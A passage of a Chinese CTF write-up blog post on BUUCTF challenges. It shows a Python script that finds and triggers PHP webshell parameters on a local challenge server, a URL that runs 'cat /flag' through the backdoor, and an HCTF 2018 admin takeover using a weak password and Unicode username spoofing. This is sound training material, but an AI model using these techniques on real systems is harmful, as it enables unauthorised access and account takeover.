class="line">    main()</span><br></pre></td></tr></table></figure></div>

<hr>
<p>后来找了个其他的，就是跑的慢了点</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">python</div></div><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os,re</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">filenames = os.listdir(<span class="string">&#x27;D:\phpstudy\PHPTutorial\WWW\src/&#x27;</span>)</span><br><span class="line">pattern = re.<span class="built_in">compile</span>(<span class="string">r&quot;\$_[GEPOST]&#123;3,4&#125;\[.*\]&quot;</span>)</span><br><span class="line"><span class="keyword">for</span> name <span class="keyword">in</span> filenames:</span><br><span class="line">    <span class="built_in">print</span>(name)</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;D:\phpstudy\PHPTutorial\WWW\src/&#x27;</span>+name,<span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        data = f.read()</span><br><span class="line">    result = <span class="built_in">list</span>(<span class="built_in">set</span>(pattern.findall(data)))</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> ret <span class="keyword">in</span> result:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            command = <span class="string">&#x27;echo &quot;got it&quot;&#x27;</span></span><br><span class="line">            flag = <span class="string">&#x27;got it&#x27;</span></span><br><span class="line">            <span class="comment"># command = &#x27;phpinfo();&#x27;</span></span><br><span class="line">            <span class="comment"># flag = &#x27;phpinfo&#x27;</span></span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;GET&#x27;</span> <span class="keyword">in</span> ret:</span><br><span class="line">                passwd = re.findall(<span class="string">r&quot;&#x27;(.*)&#x27;&quot;</span>,ret)[<span class="number">0</span>]</span><br><span class="line">                r = requests.get(url=<span class="string">&#x27;http://127.0.0.1/src/&#x27;</span> + name + <span class="string">&#x27;?&#x27;</span> + passwd + <span class="string">&#x27;=&#x27;</span>+ command)</span><br><span class="line">                <span class="keyword">if</span> <span class="string">&quot;got it&quot;</span> <span class="keyword">in</span> r.text:</span><br><span class="line">                    <span class="built_in">print</span>(<span class="string">&#x27;backdoor file is: &#x27;</span> + name)</span><br><span class="line">                    <span class="built_in">print</span>(<span class="string">&#x27;GET:  &#x27;</span> + passwd)</span><br><span class="line">            <span class="keyword">elif</span> <span class="string">&#x27;POST&#x27;</span> <span class="keyword">in</span> ret:</span><br><span class="line">                passwd = re.findall(<span class="string">r&quot;&#x27;(.*)&#x27;&quot;</span>,ret)[<span class="number">0</span>]</span><br><span class="line">                r = requests.post(url=<span class="string">&#x27;http://127.0.0.1/src/&#x27;</span> + name,data=&#123;passwd:command&#125;)</span><br><span class="line">                <span class="keyword">if</span> <span class="string">&quot;got it&quot;</span> <span class="keyword">in</span> r.text:</span><br><span class="line">                    <span class="built_in">print</span>(<span class="string">&#x27;backdoor file is: &#x27;</span> + name)</span><br><span class="line">                    <span class="built_in">print</span>(<span class="string">&#x27;POST:  &#x27;</span> + passwd)</span><br><span class="line">        <span class="keyword">except</span> : <span class="keyword">pass</span></span><br></pre></td></tr></table></figure></div>

<p><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o133qxxnj307e03rdfm.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o133qxxnj307e03rdfm.jpg" class="lazyload"></a></p>
<p>访问</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">plaintext</div></div><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">xk0SzyKwfzw.php?Efa5BVG= cat /flag</span><br><span class="line"></span><br><span class="line">然后得到flag</span><br></pre></td></tr></table></figure></div>
<p><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o133x3rmj30id06igm5.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o133x3rmj30id06igm5.jpg" class="lazyload"></a></p>
<hr>
<h2 id="HCTF-2018-admin"><a href="#HCTF-2018-admin" class="headerlink" title="[HCTF 2018]admin"></a>[HCTF 2018]admin</h2><p>进入页面看到有login</p>
<p><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o133ti8zj30v208smxf.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o133ti8zj30v208smxf.jpg" class="lazyload"></a></p>
<p>在login页面尝试注入</p>
<p><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o133xw74j30ma0e5q39.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o133xw74j30ma0e5q39.jpg" class="lazyload"></a></p>
<p>报错发现是flask模板，同时注意一个报错 <code>UnicodeError</code><br><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o134d6smj30uu0jh0yh.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o134d6smj30uu0jh0yh.jpg" class="lazyload"></a></p>
<hr>
<h3 id="解法一-非预期解"><a href="#解法一-非预期解" class="headerlink" title="解法一 (非预期解)"></a>解法一 (非预期解)</h3><p>弱口令 admin&#x2F;123</p>
<h3 id="解法二-Unicode欺骗"><a href="#解法二-Unicode欺骗" class="headerlink" title="解法二 Unicode欺骗"></a>解法二 Unicode欺骗</h3><p>在<code>change password</code>页面查看源码，发现提供了题目的源码地址</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">plaintext</div></div><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;!-- https://github.com/woadsl1234/hctf_flask/ --&gt;</span><br></pre></td></tr></table></figure></div>

<p>在 <code>route.py</code>发现，不管是login、register还是change页面，只要是关于<code>session[&#39;name&#39;]</code>的操作，都先用了strlower函数将name转成小写，但是python中有自带的转小写函数lower，这里重写了一个，可能有点猫腻，于是找到strlower函数的定义</p>
<p><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o1348v90j30w80ca0vy.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o1348v90j30w80ca0vy.jpg" class="lazyload"></a></p>
<p><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8suxgew96j30s30ic0wz.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8suxgew96j30s30ic0wz.jpg" class="lazyload"></a></p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">plaintext</div></div><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">def strlower(username):</span><br><span class="line">    username = nodeprep.prepare(username)</span><br><span class="line">    return username</span><br></pre></td></tr></table></figure></div>

<p>这里用的<code>nodeprep.prepare</code>函数，而nodeprep是从Twisted模块导入的，在requirements.txt文件中发现<code>Twisted==10.2.0</code>，而官网最新已经到了19.7.0(2019&#x2F;9)，版本差距很大，应该会存在漏洞。</p>
<p>在网站找字符</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">plaintext</div></div><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://unicode-table.com/en/1D2C/</span><br></pre></td></tr></table></figure></div>
<p>然后注册 ᴬdmin 密码 123456</p>
<p><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8suxgchitj30g40b3wei.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8suxgchitj30g40b3wei.jpg" class="lazyload"></a></p>
<p>修改密码为 888888， 登陆admin账户，得到flag</p>
<p><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8suxgcu5cj30qn0d7aai.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8suxgcu5cj30qn0d7aai.jpg" class="lazyload"></a></p>
<p>大致的思路是：在注册的时候  <code>ᴬdmin</code> 经过<code>strlower()</code>，转成，<code>admin</code>，修改密码后， 转换后的<code>admin</code>， 被<code>session[&#39;name&#39;]</code> 识别成 <code>admin</code> 用户， 登陆修改密码后的admin账户，就得到flag</p>
<hr>
<h3 id="解法三-flask-session伪造"><a href="#解法三-flask-session伪造" class="headerlink" title="解法三 flask session伪造"></a>解法三 flask session伪造</h3><p>下次专门写一篇分析 还有些东西没搞懂</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Manayakko</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://manayakko.github.io/yakko117/2019/11/10/BuuctfDay2/">https://manayakko.github.io/yakko117/2019/11/10/BuuctfDay2/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://manayakko.github.io/yakko117">Manayakko - 微笑才是王道</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/yakko117/tags/writeup/">writeup    </a></div><div class="post_share"><div class="social-share" data-image="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8nh0kz0g6j30j60j6jtw.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js"></script></div></div><nav class="pagination_post" id="pagination"><div class="prev-post pull_left"><a href="/yakko117/2019/11/18/BUUCTFDay3/"><img class="prev_cover lazyload" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8zp4u2ac5j30c80c80u2.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="label">上一篇</div><div class="prev_info"><span>BuuctfDay3</span></div></a></div><div class="next-post pull_right"><a href="/yakko117/2019/10/31/roarctf01/"><img class="next_cover lazyload" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8hmk1avohj30hm09s43l.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="label">下一篇</div><div class="next_info"><span>RoarCTF2019复现(1)</span></div></a></div></nav><div class="relatedPosts"><div class="relatedPosts_headline"><i class="fa fa-fw fa-thumbs-up" aria-hidden="true"></i><span> 相关推荐</span></div><div class="relatedPosts_list"><div class="relatedPosts_item"><a href="/yakko117/2019/10/16/2019安恒1月赛/" title="2019安恒一月赛反序列化题复现分析"><img class="relatedPosts_cover lazyload"data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8965dknxrj31hc0u01ky.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-history fa-fw" aria-hidden="true"></i> 2023-04-19</div><div class="relatedPosts_title">2019安恒一月赛反序列化题复现分析</div></div></a></div><div class="relatedPosts_item"><a href="/yakko117/2020/01/31/2020新春红包/" title="赵师傅的新春红包题"><img class="relatedPosts_cover lazyload"data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img2/redpack.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-history fa-fw" aria-hidden="true"></i> 2023-04-19</div><div class="relatedPosts_title">赵师傅的新春红包题</div></div></a></div><div class="relatedPosts_item"><a href="/yakko117/2023/03/16/BUUCTFDay11/" title="BuuctfDay11"><img class="relatedPosts_cover lazyload"data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/9a88975fec4255819a88f8d9c73c8948.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-history fa-fw" aria-hidden="true"></i> 2023-07-11</div><div class="relatedPosts_title">BuuctfDay11</div></div></a></div></div><div class="clear_both"></div></div></div></main><footer id="footer" style="background-image: url(https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8nh0kz0g6j30j60j6jtw.jpg)" data-type="photo"><div id="footer-wrap"><div class="copyright">&copy;2019 - 2023 By Manayakko</div><div class="framework-info"><span>驱动 </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly"><span>Butterfly</span></a></div></div></footer></div><section class="rightside" id="rightside"><div id="rightside-config-hide"><i class="fa fa-book" id="readmode" title="阅读模式"></i><i class="fa fa-plus" id="font_plus" title="放大字体"></i><i class="fa fa-minus" id="font_minus" title="缩小字体"></i><a class="translate_chn_to_cht" id="translateLink" href="javascript:translatePage();" title="简繁转换" target="_self">繁</a><i class="darkmode fa fa-moon-o" id="darkmode" title="夜间模式"></i></div><div id="rightside-config-show"><div id="rightside_config" title="设置"><i class="fa fa-cog" aria-hidden="true"></i></div><i class="fa fa-list-ul close" id="mobile-toc-button" title="目录" aria-hidden="true"></i><i class="fa fa-arrow-up" id="go-up" title="回到顶部" aria-hidden="true"></i></div></section><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/yakko117/js/utils.js"></script><script src="/yakko117/js/main.js"></script><script src="/yakko117/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script type="text/x-mathjax-config">MathJax.Hub.Config({
  tex2jax: {
    inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
    processEscapes: true,
    skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
  },
  CommonHTML: {
    linebreaks: { automatic: true, width: "90% container" }
  },
  "HTML-CSS": { 
    linebreaks: { automatic: true, width: "90% container" }
  },
  "SVG": { 
    linebreaks: { automatic: true, width: "90% container" }
  }
});
</script><script type="text/x-mathjax-config">MathJax.Hub.Queue(function() {
  var all = MathJax.Hub.getAllJax(), i;
  for (i=0; i < all.length; i += 1) {
    all[i].SourceElement().parentNode.className += ' has-jax';
  }
});
</script><script src="https://cdn.jsdelivr.net/npm/mathjax/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex@latest/dist/katex.min.css"><script src="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.js"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.css"><script>$(function () {
  $('span.katex-display').wrap('<div class="katex-wrap"></div>')
})</script><script src="https://cdn.jsdelivr.net/npm/instant.page@latest/instantpage.min.js" type="module"></script><script src="https://cdn.jsdelivr.net/npm/lazysizes@latest/lazysizes.min.js" async=""></script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div><script src="/yakko117/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/yakko117/live2dw/assets/assets/shizuku.model.json"},"display":{"position":"right","hOffset":60,"vOffset":-20,"width":90,"height":180},"mobile":{"show":false},"log":false});</script></body></html>